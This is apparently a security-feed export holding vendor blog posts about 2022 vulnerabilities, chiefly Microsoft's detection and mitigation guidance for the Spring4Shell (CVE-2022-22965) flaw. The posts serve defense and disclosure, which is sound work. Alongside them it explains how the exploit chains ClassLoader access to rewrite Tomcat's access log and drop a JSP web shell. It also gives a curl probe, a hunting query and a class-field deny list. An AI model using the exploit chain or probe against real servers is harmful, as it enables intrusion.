announced](<https://www.malwarebytes.com/blog/news/2022/10/critical-openssl-fix-due-november-1st-get-ready-to-patch>) a fix for a critical issue in OpenSSL, everybody remembered that the last time OpenSSL fixed a critical vulnerability, that vulnerability was known as [Heartbleed](<https://www.malwarebytes.com/blog/news/2019/09/everything-you-need-to-know-about-the-heartbleed-vulnerability>). The Heartbleed vulnerability was discovered and patched in 2014, but unpatched systems kept popping up for years.\n\nHowever, when the patch came out for the more recent OpenSSL issue, it turned out the bug had been [downgraded in severity](<https://www.malwarebytes.com/blog/news/2022/11/openssl-bug-downgraded-in-severity-patches-now-available>). 
That was good news all around: The patch for the two vulnerabilities is available, and the announced vulnerability wasn't as severe as we expected. And there is no known exploit for the vulnerabilities doing the rounds.\n\n## 3\\. Zero-day\n\nThe different interpretations for the term zero-day tend to be confusing as well.\n\nThe most accepted definition is:\n\n> "A zero-day is a flaw in software, hardware or firmware that is unknown to the party or parties responsible for patching or otherwise fixing the flaw."\n\nBut you will almost as often see something called a zero-day because the patch is not available yet, even though the party or parties responsible for patching or otherwise fixing the flaw are aware of the vulnerability. For example, Microsoft uses this definition:\n\n> "A zero-day vulnerability is a flaw in software for which no official patch or security update has been released. A software vendor may or may not be aware of the vulnerability, and no public information about this risk is available."\n\nThe difference is significant. The fact that a vulnerability exists is true for almost any complex platform or software. Someone has to find such a vulnerability before it becomes a risk. Then it depends on the researcher finding the flaw whether it becomes a threat. 
If the researcher follows the rules of responsible disclosure, the vendor will be made aware of the existence of the flaw before anyone else, and the vendor will have a chance to find and publish a fix for the bug before any malicious actors find out about it.\n\nSo, for a vulnerability to be alarming, I would argue it has to be used in the wild or a public Proof-of-Concept has to be available _before_ the patch has been released.\n\nAs an example of where this went wrong, a set of critical RCE [vulnerabilities in WhatsApp](<https://www.malwarebytes.com/blog/news/2022/09/critical-whatsapp-vulnerabilities-patched-check-youve-updated>) got designated as a zero-day by several outlets, including some that should know better. As it turned out, the vulnerabilities listed as [CVE-2022-36934](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36934>) and [CVE-2022-27492](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27492>) were found by the WhatsApp internal security team and silently fixed, so they never posed any actual risk to any user. Yes, the consequences would have been disastrous if threat actors had found the vulnerabilities before the WhatsApp team did, but there never were any indications that these vulnerabilities had been exploited.\n\n## 4\\. Spring4Shell\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database as an individual number. CVE numbers are very helpful because they are unique and used in many reliable sources, so they make it easy to find a lot of information about a particular vulnerability. But they are hard to remember (for me at least). 
Coming up with fancy names and logos for vulnerabilities, such as Log4Shell, Heartbleed, and Meltdown/Spectre, helps us to tell them apart.\n\nBut when security experts themselves start to confuse different vulnerabilities in the same framework and researchers disclose details about an unpatched vulnerability because they think the information is out anyway, serious problems can arise.\n\nIn March, two RCE vulnerabilities were being discussed on the internet. Most of the people talking about them believed they were talking about \"Spring4Shell\" ([CVE-2022-22965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965>)), but in reality they were discussing [CVE-2022-22963](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22963>). To add to the stress, a Chinese researcher prematurely spilled details about the vulnerability before the developer of the vulnerable Spring Framework could come up with a patch. This may have been due to the confusion about the two vulnerabilities.\n\nIn the end, Spring4Shell fizzled, working only for certain configurations (notably Spring MVC applications deployed as a WAR on Tomcat under JDK 9 or later) and not for an out-of-the-box install.\n\n## Public service or not?\n\nSo, are we doing the public a service by writing about vulnerabilities? We feel we are, because it is good to raise awareness about the existence of vulnerabilities. But, to be effective, we need to meet certain criteria.\n\n * First of all, it needs to be made clear who is affected and who needs to do something about it. 
And what you can do to protect yourself.\n * While it is not always easy to make an assessment about the threat level, since we often don't have the exact details of a vulnerability, it is desirable to not exaggerate the impact.\n * Make it very clear whether or not a threat is being used in the wild if you have that information.\n\nIn a recent assessment, security researcher [Amelie Koran](<https://infosec.exchange/@webjedi>) said on Mastodon that the economic costs of Heartbleed were mostly due to vulnerability assessment and patching and not necessarily lost or stolen data. Not that it wouldn't have backfired if the patch hadn't been deployed, but it is something to keep in mind. A panic situation can do more harm than the actual threat.\n\n* * *\n\n**We don't just report on threats--we remove them**\n\nCybersecurity risks should never spread beyond a headline. Keep threats off your devices by [downloading Malwarebytes today](<https://www.malwarebytes.com/for-home>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-12-19T01:00:00", "type": "malwarebytes", "title": "4 over-hyped security vulnerabilities of 2022", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, 
"acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963", "CVE-2022-22965", "CVE-2022-27492", "CVE-2022-34718", "CVE-2022-36934"], "modified": "2022-12-19T01:00:00", "id": "MALWAREBYTES:30F9B0094E0BC177A7D657BF67D87E39", "href": "https://www.malwarebytes.com/blog/news/2022/12/4-times-security-vulnerabilities-were-blown-out-of-proportion-in-2022", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "mmpc": [{"lastseen": "2022-04-11T23:40:15", "description": "**_April 11, 2022 update_** \u2013 __Azure Web Application Firewall (WAF) customers with Regional WAF with Azure Application Gateway now have enhanced protection for critical Spring vulnerabilities - [CVE-2022-22963](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22963>), [CVE-2022-22965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965>), and [CVE-2022-22947](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22947>)._ _See the Detect and protect with Azure Web Application Firewall (Azure WAF) section for details__.\n\nOn March 31, 2022, vulnerabilities in the Spring Framework for Java were [publicly disclosed](<https://www.springcloud.io/post/2022-03/spring-framework-rce-early-announcement/#gsc.tab=0>). Microsoft is currently assessing the impact associated with these vulnerabilities. This blog is for customers looking for protection against exploitation and ways to detect vulnerable installations on their network of the critical remote code execution (RCE) vulnerability [CVE-2022-22965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965>) (also known as SpringShell or Spring4Shell).\n\nThe Spring Framework is the most widely used lightweight open-source framework for Java. 
In Java Development Kit (JDK) version 9.0 or later, a remote attacker can obtain an _AccessLogValve_ object through the framework\u2019s parameter binding feature and use malicious field values to trigger the pipeline mechanism and write to a file in an arbitrary path, if certain conditions are met. \n\nThe vulnerability in Spring Core\u2014referred to in the security community as SpringShell or Spring4Shell\u2014can be exploited when an attacker sends a specially crafted query to a web server running the Spring Core framework. Other vulnerabilities disclosed in the same component are less critical and not tracked as part of this blog.\n\nImpacted systems have the following traits:\n\n * Running JDK 9.0 or later\n * Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and earlier versions\n * Apache Tomcat as the Servlet container:\n * Packaged as a traditional Java web archive (WAR) and deployed in a standalone Tomcat instance; typical Spring Boot deployments using an embedded Servlet container or reactive web server are not impacted\n * Tomcat has _spring-webmvc_ or _spring-webflux_ dependencies\n\nAny system using JDK 9.0 or later and using the Spring Framework or derivative frameworks should be considered vulnerable. The following nonmalicious command can be used to determine vulnerable systems:\n \n \n $ curl host:port/path?class.module.classLoader.URLs%5B0%5D=0\n\nA host that returns an HTTP 400 response should be considered vulnerable to the attack detailed in the proof of concept (POC) below. Here _path_ must be a request-mapped handler that binds a Java object (POJO) from request parameters, since that binding is what the probe exercises; a non-400 response from an endpoint that performs no such binding says nothing about the host. Run the probe only against systems you are authorized to test: it is likely to trigger the same WAF and IDPS signatures as a real exploit attempt. 
Note that while this test is a good indicator of a system\u2019s susceptibility to an attack, a negative result does not prove a host is safe: any system within the scope of impacted systems listed above should still be considered vulnerable.\n\nThe [threat and vulnerability management](<https://docs.microsoft.com/azure/defender-for-cloud/deploy-vulnerability-assessment-tvm>) console within [Microsoft 365 Defender](<https://www.microsoft.com/microsoft-365/security/microsoft-365-defender>) provides detection and reporting for this vulnerability.\n\nThis blog covers the following topics:\n\n 1. Observed activity\n 2. Attack breakdown\n 3. The vulnerability and exploit in depth\n * Background\n * Request mapping and request parameter binding\n * The process of property binding\n * The vulnerability and its exploitation\n * Prelude: CVE-2010-1622\n * The current exploit: CVE-2022-22965\n * From ClassLoader to AccessLogValve\n 4. Discovery and mitigations\n * How to find vulnerable devices\n * Enhanced protection with Azure Firewall Premium\n * Detect and protect with Azure Web Application Firewall (Azure WAF)\n * Global WAF with Azure Front Door\n * Regional WAF with Azure Application Gateway\n * Patch information and workarounds\n 5. Detections\n * Microsoft 365 Defender\n * Endpoint detection and response (EDR)\n * Antivirus\n * Hunting\n * Microsoft 365 Defender advanced hunting queries \n * Microsoft Sentinel\n\n## Observed activity\n\nMicrosoft regularly monitors attacks against our cloud infrastructure and services to defend them better. Since the Spring Core vulnerability was announced, we have been tracking a low volume of exploit attempts across our cloud services for Spring Cloud and Spring Core vulnerabilities. 
For CVE-2022-22965, the attempts closely align with the basic web shell POC described in this post.\n\nMicrosoft\u2019s continued monitoring of the threat landscape has not indicated a significant increase in quantity of attacks or new campaigns at this time.\n\n## Attack breakdown\n\nCVE-2022-22965 affects functions that use request mapping annotation and Plain Old Java Object (POJO) parameters within the Spring Framework. The POC code creates a controller that, when loaded into Tomcat, handles HTTP requests. \n\nThe only publicly available working POC (at the time of writing) is specific to Tomcat server's logging properties via the _ClassLoader_ module in the _propertyDescriptor_ cache. The attacker can update the _AccessLogValve_ object's properties using the module to create a web shell in the Tomcat root directory called _shell.jsp_. The attacker can then redirect the default access log to a file path of their choosing.\n\nFigure 1. Screenshot from the original POC code post\n\nThe changes to _AccessLogValve_ can be achieved by an attacker who can use HTTP requests to create a _.jsp_ file in the service\u2019s root directory. In the example below, each GET parameter is set as a Java object property. Each GET request then executes Java code resembling the example below, wherein the final segment \u201csetPattern\u201d would be unique for each call (such as setPattern, setSuffix, setDirectory, and others): \n\n Figure 2. Screenshot from the original POC code post Figure 3. Screenshot from the original POC code post\n\nThe _.jsp_ file now contains a payload with a password-protected web shell with the following format:\n\n\n\nThe attacker can then use HTTP requests to execute commands. 
While the above POC depicts a command shell as the inserted code, this attack could be performed using any executable code.\n\n## The vulnerability and exploit in depth\n\nThe vulnerability in Spring results in a client's ability, in some cases, to modify sensitive internal variables inside the web server or application by carefully crafting the HTTP request.\n\nIn the case of the Tomcat web server, the vulnerability allowed manipulation of the access log so that it is written to an arbitrary path with somewhat arbitrary contents. The POC above sets the contents to be a JSP web shell and the path inside the Tomcat's web application ROOT directory, which effectively drops a web shell into the web root (not a reverse shell: the attacker then drives it over ordinary inbound HTTP requests, as described above). For the web application to be vulnerable, it needs to use Spring\u2019s request mapping feature, with the handler function receiving a Java object as a parameter.\n\n### Background\n\n#### Request mapping and request parameter binding\n\nSpring allows developers to map HTTP requests to Java handler methods. The web application's developer can ask Spring to call an appropriate handler method each time a user requests a specific URI. For instance, the following web application code will cause Spring to invoke the method _handleWeatherRequest_ each time a user requests the URI _/WeatherReport_:\n \n \n @RequestMapping(\"/WeatherReport\")\n public String handleWeatherRequest(Location reportLocation)\n {\n \u2026\n }\n\nMoreover, through request parameter binding, the handler method can accept arguments passed through parameters in GET/POST/REST requests. In the above example, Spring will instantiate a _Location_ object, initialize its fields according to the HTTP request\u2019s parameters, and pass it on to _handleWeatherRequest_. 
So, if, for instance, _Location_ is defined as:\n \n \n class Location \n { \n public void setCountry(String country) {\u2026} \n public void setCity(String city) {\u2026} \n public String getCountry() {\u2026} \n public String getCity() {\u2026} \n }\n\nand we issue the following HTTP request:\n \n \n example.com/WeatherReport?country=USA&city=Redmond\n\nThe resulting call to _handleWeatherRequest_ will automatically have a _reportLocation_ argument with the country set to USA and city set to Redmond. \n\nIf _Location_ had a sub-object named _coordinates_, which contained _longitude_ and _latitude_ parameters, then Spring would try and initialize them out of the parameters of an incoming request. For example, when receiving a request with GET params _coordinates.longitude=123&coordinates.latitude=456_ Spring would try and set those values in the _coordinates_ member of _location_, before handing over control to _handleWeatherRequest_.\n\nThe SpringShell vulnerability directly relates to the process Spring uses to populate these fields.\n\n#### The process of property binding\n\nWhenever Spring receives an HTTP request mapped to a handler method as described above, it will try and bind the request\u2019s parameters for each argument in the handler method. Now, to stick with the previous example, a client asked for:\n \n \n example.com/WeatherReport?x.y.z=foo\n\nSpring would instantiate the argument (in our case, create a _Location_ object). Then it breaks up the parameter name by dots (.) and tries to do a series of steps:\n\n 1. Use Java introspection to map all accessors and mutators in _location_\n 2. If location has a _getX()_ accessor, call it to get the _x_ member of location\n 3. Use Java introspection to map all accessors and mutators in the _x_ object\n 4. If the _x_ object has a _getY()_ accessor, call it to get the _y_ object inside of the _x_ object\n 5. Use Java introspection to map all accessors and mutators in the _y_ object\n 6. 
If the _y_ object has a _setZ()_ mutator, call it with parameter _\u201cfoo\u201d_\n\nSo essentially, ignoring the details, we get _location.getX().getY().setZ(\u201cfoo\u201d)_.\n\n### The vulnerability and its exploitation\n\n#### Prelude: CVE-2010-1622\n\nIn June 2010, a CVE was [published](<https://nvd.nist.gov/vuln/detail/CVE-2010-1622>) for the Spring framework. The crux of the CVE was as follows:\n\n 1. All Java objects implicitly contain a _getClass()_ accessor that returns the _Class_ describing the object's class.\n 2. _Class_ objects have a _getClassLoader()_ accessor that gets the _ClassLoader_ object.\n 3. Tomcat uses its own class loader for its web applications. This class loader contains various members that can affect Tomcat\u2019s behavior. One such member is _URLs_, which is an array of URLs the class loader uses to retrieve resources.\n 4. Overwriting one of the URLs with a URL to a remote JAR file would cause Tomcat to subsequently load the JAR from an attacker-controlled location.\n\nThe bug was fixed in Spring by preventing the mapping of the _getClassLoader()_ or _getProtectionDomain()_ accessors of _Class_ objects during the property-binding phase. Hence _class.classLoader_ would not resolve, thwarting the attack. Note that this fix was a deny-list of two specific accessors rather than a general restriction on reaching a _ClassLoader_ through binding, which is why a new accessor path was later enough to bypass it.\n\n#### The current exploit: CVE-2022-22965\n\nThe current exploit leverages the same mechanism as in CVE-2010-1622, bypassing the previous bug fix. Java 9 added a new technology called Java Modules. An accessor was added to the _Class_ object, called _getModule()_. The _Module_ object contains a _getClassLoader()_ accessor. Since the CVE-2010-1622 fix only prevented mapping the _getClassLoader()_ accessor of _Class_ objects, Spring still mapped the _getClassLoader()_ accessor of the _Module_ object. 
Once again, one could reference the class loader from Spring via the _class.module.classLoader_ parameter name prefix.\n\n#### From _ClassLoader_ to _AccessLogValve_\n\nThe latest exploit uses the same accessor chaining, via the Tomcat class loader, to drop a JSP web shell on the server.\n\nThis is done by manipulating the properties of the _AccessLogValve_ object in Tomcat\u2019s pipeline. The _AccessLogValve_ is referenced using the _class.module.classLoader.resources.context.parent.pipeline.first_ parameter prefix.\n\nThe following properties are changed:\n\n 1. **Directory:** The path where to store the access log, relative to Tomcat\u2019s root directory. This can be manipulated to point into a location accessible by HTTP requests, such as the web application\u2019s directory.\n 2. **Prefix:** The prefix of the access log file name\n 3. **Suffix:** The suffix of the access log file name. The log file name is a concatenation of the prefix with the suffix.\n 4. **Pattern:** A string that describes the log record structure. This can be manipulated so that each record will essentially contain a JSP web shell.\n 5. **FileDateFormat:** Setting this causes the new access log settings to take effect.\n\nOnce the web shell is dropped on the server, the attacker can execute commands on the server with the privileges of the account running the Tomcat process; running Tomcat as an unprivileged service account therefore limits the blast radius. Because the exploit rewrites live access-log settings, incident responders should also look for unexpected _.jsp_ files in the web application directory and for access-log directory, prefix, suffix or pattern values that differ from the configured ones.\n\n## Discovery and mitigations\n\n### How to find vulnerable devices\n\n[Threat and vulnerability management](<https://www.microsoft.com/security/business/threat-protection/threat-vulnerability-management>) capabilities in [Microsoft Defender for Endpoint](<https://www.microsoft.com/security/business/threat-protection/endpoint-defender>) monitor an organization\u2019s overall security posture and equip customers with real-time insights into organizational risk through continuous vulnerability discovery, intelligent prioritization, and the ability to seamlessly remediate vulnerabilities. 
\n\nCustomers can now search for CVE-2022-22965 to find vulnerable devices through the [Weaknesses](<https://securitycenter.microsoft.com/vulnerabilities?search=CVE-2022-22965>) page in threat and vulnerability management.\n\nFigure 4. Weaknesses page in Microsoft Defender for Endpoint\n\n### Enhanced protection with Azure Firewall Premium\n\nCustomers using [Azure Firewall Premium](<https://docs.microsoft.com/azure/firewall/premium-migrate>) have enhanced protection from the SpringShell CVE-2022-22965 vulnerability and exploits. Azure Firewall Premium Intrusion Detection and Prevention System (IDPS) provides IDPS inspection for all east-west traffic, outbound traffic to the internet, and inbound HTTP traffic from the internet. The vulnerability rulesets are continuously updated and include vulnerability protection for SpringShell since March 31, 2022. The screenshot below shows all the scenarios which are actively mitigated by Azure Firewall Premium.\n\nConfigure Azure Firewall Premium with both IDPS Alert & Deny mode and TLS inspection enabled for proactive protection against CVE-2022-22965 exploit. \n\nFigure 5. Azure Firewall Premium portal detecting CVE-2022-22965 exploitation attempts.\n\nCustomers using Azure Firewall Standard can migrate to Premium by following [these directions](<https://docs.microsoft.com/azure/firewall/premium-migrate>). 
Customers new to Azure Firewall Premium can learn more about [Firewall Premium](<https://docs.microsoft.com/azure/firewall/premium-features>).\n\n### Detect and protect with Azure Web Application Firewall (Azure WAF)\n\nAzure Web Application Firewall (WAF) customers with Azure Front Door and Azure Application Gateway deployments now have enhanced protection for the SpringShell exploit - [CVE-2022-22965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965>), and other high impact Spring vulnerabilities [CVE-2022-22963](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22963>) and [CVE-2022-22947](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22947>). To help detect and mitigate these critical Spring vulnerabilities, we have released four new rules.\n\n#### Global WAF with Azure Front Door\n\nAzure WAF has updated Default Rule Set (DRS) versions 2.0/1.1/1.0.\n\n * Rule group: _MS-ThreatIntel-WebShells_, Rule Id: 99005006 - Spring4Shell Interaction Attempt\n * Rule group: _MS-ThreatIntel-CVEs_, Rule Id: 99001014 - Attempted Spring Cloud routing-expression injection (CVE-2022-22963)\n * Rule group: _MS-ThreatIntel-CVEs_, Rule Id: 99001015 - Attempted Spring Framework unsafe class object exploitation (CVE-2022-22965)\n * Rule group: _MS-ThreatIntel-CVEs_, Rule Id: 99001016 - Attempted Spring Cloud Gateway Actuator injection (CVE-2022-22947)\n\nWAF rules on Azure Front Door are disabled by default on existing Microsoft managed rule sets.\n\nFigure 6. Screenshot of WAF Spring vulnerabilities\n\n#### Regional WAF with Azure Application Gateway\n\nAzure WAF has updated OWASP Core Rule Set (CRS) versions for Azure Application Gateway WAF V2 regional deployments. 
New rules are under _Known_CVEs_ rule group:\n\n * Rule Id: 800110 - _Spring4Shell Interaction Attempt_\n * Rule Id: 800111 - _Attempted Spring Cloud routing-expression injection_ - CVE-2022-22963\n * Rule Id: 800112 - _Attempted Spring Framework unsafe class object exploitation_ - CVE-2022-22965\n * Rule Id: 800113 - _Attempted Spring Cloud Gateway Actuator injection_ - CVE-2022-22947\n\nWAF rules on Azure Application Gateway are _enabled_ by default for supported CRS versions.\n\nFigure 7. Spring vulnerability rules for Azure Application Gateway OWASP Core Rule Set (CRS)\n\n**Recommendation**: Enable WAF SpringShell rules to get protection from these threats. WAF rules are a compensating control that reduces exposure while you patch; they do not replace upgrading the Spring Framework. We will continue to monitor threat patterns and modify the above rules in response to emerging attack patterns as required. \n\nFor more information about Managed Rules and Default Rule Set (DRS) on Azure Front Door, see the [Web Application Firewall DRS rule groups and rules documentation](<https://docs.microsoft.com/azure/web-application-firewall/afds/waf-front-door-drs>). For more information about Managed Rules and OWASP Core Rule Set (CRS) on Azure Application Gateway, see the [Web Application Firewall CRS rule groups and rules documentation](<https://docs.microsoft.com/en-us/azure/web-application-firewall/ag/application-gateway-crs-rulegroups-rules?tabs=owasp32>)\n\n### Patch information and workarounds\n\nCustomers are encouraged to apply these mitigations to reduce the impact of this threat. Check the recommendations card in Microsoft 365 Defender threat and vulnerability management for the deployment status of monitored mitigations.\n\n * An [update](<https://spring.io/blog/2022/03/31/spring-boot-2-6-6-available-now>) is available for CVE-2022-22965. Administrators should upgrade to Spring Framework 5.3.18 or later, or 5.2.20 or later (5.2.19 is still within the affected range listed above); Spring Boot 2.6.6 ships the fixed framework. 
If the patch is applied, no other mitigation is necessary.\n\nIf you\u2019re unable to patch CVE-2022-22965, you can implement this set of workarounds published by [Spring](<https://www.springcloud.io/post/2022-03/spring-framework-rce-early-announcement/#gsc.tab=0>):\n\n * Search the @InitBinder annotation globally in the application to see if the dataBinder.setDisallowedFields method is called in the method body. If the introduction of this code snippet is found, add `{\"class.*\",\"Class.*\",\"*.class.*\", \"*.Class.*\"}` to the original blacklist. (**Note:** If this code snippet is used a lot, it needs to be appended in each location, because a controller-local setDisallowedFields call replaces rather than extends the global list below.)\n * Add the following global class into the package where the Controller is located. Then recompile and test the project for functionality:\n \n \n import org.springframework.core.annotation.Order;\n import org.springframework.web.bind.WebDataBinder;\n import org.springframework.web.bind.annotation.ControllerAdvice;\n import org.springframework.web.bind.annotation.InitBinder;\n @ControllerAdvice\n @Order(10000)\n public class GlobalControllerAdvice {\n @InitBinder\n public void setAllowedFields(WebDataBinder dataBinder) {\n String[] abd = new String[]{\"class.*\",\"Class.*\",\"*.class.*\",\"*.Class.*\"};\n dataBinder.setDisallowedFields(abd);\n }\n }\n\n## Detections\n\n### Microsoft 365 Defender\n\n#### Endpoint detection and response (EDR)\n\nAlerts with the following title in the security center can indicate threat activity on your network:\n\n * Possible SpringShell exploitation\n\nThe following alert may fire for an observed attack, but might not be unique to exploitation of this vulnerability:\n\n * Suspicious process executed by a network service\n\n#### Antivirus\n\nMicrosoft Defender antivirus version **1.361.1234.0** or later detects components and behaviors related to this threat with the following detections:\n\n * Trojan:Python/SpringShellExpl\n * Exploit:Python/SpringShell\n * Backdoor:PHP/Remoteshell.V\n\n### Hunting\n\n#### 
Microsoft 365 Defender advanced hunting queries \n\nUse the query below to surface exploitation of CVE-2022-22965 on both victim devices and devices performing the exploitation. Note that this query only covers HTTP use of the exploitation and not HTTPS. It also keys on the public POC's _.jsp?cmd=_ web shell invocation, so a web shell dropped under a different name or driven by a different parameter will not match; treat it as a starting point, not as proof of absence.\n \n \n DeviceNetworkEvents\n | where Timestamp > ago(7d)\n | where ActionType =~ \"NetworkSignatureInspected\"\n | where AdditionalFields contains \".jsp?cmd=\"\n | summarize makeset(AdditionalFields, 5), min(Timestamp), max(Timestamp) by DeviceId, DeviceName \n\n#### Microsoft Sentinel\n\nMicrosoft Sentinel customers can use the following queries to look for this threat activity:\n\n * [Possible SpringShell exploitation attempt (CVE-2022-22965)](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting Queries/AzureDiagnostics/SpringShellExploitationAttempt.yaml>) \u2013 This hunting query looks in Azure Web Application Firewall data to find possible SpringShell exploitation attempts (CVE-2022-22965) to drop a malicious web shell in a location accessible by HTTP requests. Attackers then make requests to the malicious backdoor to run system commands.\n * [Possible web shell usage attempt related to SpringShell (CVE-2022-22965)](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting Queries/AzureDiagnostics/SpringshellWebshellUsage.yaml>) \u2013 This hunting query looks in Azure Web Application Firewall data to find possible web shell usage related to SpringShell RCE vulnerability (CVE-2022-22965).\n * [AV detections related to SpringShell Vulnerability](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityAlert/AVSpringShell.yaml>) \u2013 This query looks for Microsoft Defender for Endpoint hits related to the SpringShell vulnerability. In Microsoft Sentinel, the _SecurityAlerts_ table includes only the device name of the affected device. This query joins the _DeviceInfo_ table to clearly connect other information such as device group, IP address, signed in users, and others. 
This allows the Microsoft Sentinel analyst to have more context related to the alert, if available.\n\n**Revision history**\n\n_[04/11/2022] \u2013 _Application Gateway now has enhanced protection for critical Spring vulnerabilities - [CVE-2022-22963](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22963>), [CVE-2022-22965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965>), and [CVE-2022-22947](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22947>)._ _See _Detection and Mitigation section for details_.\n\n_[04/08/2022] \u2013 Azure Web Application Firewall (WAF) customers with Azure Front Door now has enhanced protection for Spring4Shell exploits - CVE-2022-22963, CVE-2022-22965, and CVE-2022-22947. See Detection and Mitigation section for details. \n[04/05/2022] \u2013 We added Microsoft Sentinel hunting queries to look for SpringShell exploitation activity._\n\nThe post [SpringShell RCE vulnerability: Guidance for protecting against and detecting CVE-2022-22965](<https://www.microsoft.com/security/blog/2022/04/04/springshell-rce-vulnerability-guidance-for-protecting-against-and-detecting-cve-2022-22965/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-05T01:11:24", "type": "mmpc", "title": "SpringShell RCE vulnerability: Guidance for protecting against and detecting CVE-2022-22965", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": 
false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1622", "CVE-2022-22947", "CVE-2022-22963", "CVE-2022-22965", "CVE-2202-22965"], "modified": "2022-04-05T01:11:24", "id": "MMPC:07417E2EE012BAE0350B156AD2AE30B3", "href": "https://www.microsoft.com/security/blog/2022/04/04/springshell-rce-vulnerability-guidance-for-protecting-against-and-detecting-cve-2022-22965/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "impervablog": [{"lastseen": "2022-03-31T18:03:34", "description": "New zero-day Remote Code Execution (RCE) vulnerabilities were discovered in Spring Framework, an application development framework and inversion of control container for the Java platform. The vulnerabilities potentially leave millions of applications at risk of compromise. In two separate disclosures, [zero-day](<https://www.imperva.com/learn/application-security/zero-day-exploit/>) RCE vulnerabilities were revealed in the Cloud and Core modules of Spring Framework.\n\nSpring Framework \u201cprovides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform\u201d [[1](<https://spring.io/projects/spring-framework>)]. Java is one of the most commonly used development languages, and Spring is commonly cited as one of the most popular Java frameworks.\n\nThe first of the disclosures [dropped](<https://www.cyberkendra.com/2022/03/rce-0-day-exploit-found-in-spring-cloud.html>) on March 26, and reported on a vulnerability in Spring Cloud's function routing feature, which allowed for the injection of a SpEL (Spring Expression Language) expression into a routing-expression header value. 
This crafted header value would then be evaluated by the server and could result in a RCE. The vulnerability was assigned [CVE-2022-22963](<https://tanzu.vmware.com/security/cve-2022-22963>).\n\nThe second of these disclosures was released on March 29 on Twitter by a researcher, in a since-deleted Tweet, containing a screenshot of the exploit request. Since then, the exploit was tweeted by others and published to GitHub, but again, was quickly removed. The vulnerability, called Spring Framework RCE via Data Binding on JDK 9+, comes in the form of a Java class injection flaw in Spring Core, where the JDK version is >=9.0. If exploited, an attacker can leverage this vulnerability to perform a RCE on the server. This vulnerability was assigned [CVE-2022-22965](<https://tanzu.vmware.com/security/CVE-2022-22965>).\n\nSince the disclosures, Imperva Threat Research monitored widespread attempted exploitations of _both_ new zero-day vulnerabilities (~5.5 million and counting as of March 31).\n\n## Imperva Delivers Protection from CVE-2022-22963\n\nImperva Threat Research analysts downloaded and quickly tested the exploit, verifying that both vulnerabilities are blocked out of the box by [Imperva Cloud Web Application Firewall](<https://www.imperva.com/products/web-application-firewall-waf/>) (WAF) and Imperva WAF Gateway.\n\nGiven the nature of how [Imperva Runtime Protection (RASP)](<https://www.imperva.com/products/runtime-application-self-protection-rasp/>) works, RCEs caused by CVE-2022-22963 and Spring4Shell are stopped without requiring any code changes or policy updates. If Imperva RASP is currently deployed, applications of all kinds (active, legacy, third-party, APIs, etc.) are protected.\n\nTogether, Imperva WAF and Imperva RASP provide defense-in-depth for protecting applications and APIs. Both are industry-leading products that are designed to protect against zero day threats and the OWASP Top 10 application security threats, injections and weaknesses. 
